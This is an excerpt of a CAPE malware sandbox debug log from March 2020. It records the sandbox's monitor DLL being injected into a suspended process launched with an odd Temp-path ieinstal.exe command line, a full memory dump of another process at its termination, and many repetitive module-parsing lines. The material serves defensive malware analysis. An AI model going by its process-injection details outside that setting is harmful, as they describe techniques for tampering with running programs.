2020-03-24 10:13:52,397 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,397 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:52,397 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,413 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,413 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,413 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:52,427 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,427 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,427 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,444 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,444 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:52,444 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,444 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1540 at 0x74880000, image base 0x430000, stack from 0x386000-0x390000
2020-03-24 10:13:52,444 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:52,444 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\internet explorer\ieinstal.exe".
2020-03-24 10:13:52,444 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,460 [root] INFO: Added new process to list with pid: 1540
2020-03-24 10:13:52,460 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,460 [root] INFO: Monitor successfully loaded in process with pid 1540.
2020-03-24 10:13:52,460 [root] DEBUG: set_caller_info: Adding region at 0x000F0000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 10:13:52,490 [root] DEBUG: set_caller_info: Adding region at 0x002B0000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 10:13:52,506 [root] DEBUG: set_caller_info: Adding region at 0x00180000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 10:13:52,522 [root] DEBUG: set_caller_info: Adding region at 0x10530000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 10:13:52,538 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1964
2020-03-24 10:13:52,538 [root] DEBUG: GetHookCallerBase: thread 420 (handle 0x0), return address 0x035B6365, allocation base 0x035A0000.
2020-03-24 10:13:52,552 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1964.dmp.
2020-03-24 10:13:52,552 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 10:13:52,552 [root] DEBUG: ApiReader: module list size: 28
2020-03-24 10:13:52,569 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,569 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:52,584 [root] DEBUG: DLL loaded at 0x73BD0000: C:\Windows\system32\MSVCP60 (0x66000 bytes).
2020-03-24 10:13:52,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:52,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,599 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-03-24 10:13:52,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,599 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-03-24 10:13:52,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,647 [root] DEBUG: DLL loaded at 0x72720000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus (0x190000 bytes).
2020-03-24 10:13:52,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,677 [root] DEBUG: set_caller_info: Adding region at 0x00400000 to caller regions list (msvcrt::memcpy).
2020-03-24 10:13:52,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,694 [root] DEBUG: set_caller_info: Adding region at 0x002D0000 to caller regions list (ntdll::NtClose).
2020-03-24 10:13:52,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,709 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-03-24 10:13:52,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,709 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-03-24 10:13:52,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,724 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2020-03-24 10:13:52,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,724 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2020-03-24 10:13:52,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,740 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2020-03-24 10:13:52,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,756 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-03-24 10:13:52,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,772 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2020-03-24 10:13:52,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,786 [root] DEBUG: DLL loaded at 0x73BB0000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-03-24 10:13:52,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,802 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-03-24 10:13:52,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,927 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,959 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,959 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:52,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,006 [root] DEBUG: DLL loaded at 0x73B90000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-03-24 10:13:53,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,020 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,020 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,036 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,130 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,348 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,364 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,364 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,364 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:53,380 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,380 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:53,380 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:53,395 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:53,395 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:53,395 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:53,411 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:53,411 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:53,411 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:53,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:53,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,441 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:53,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:53,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
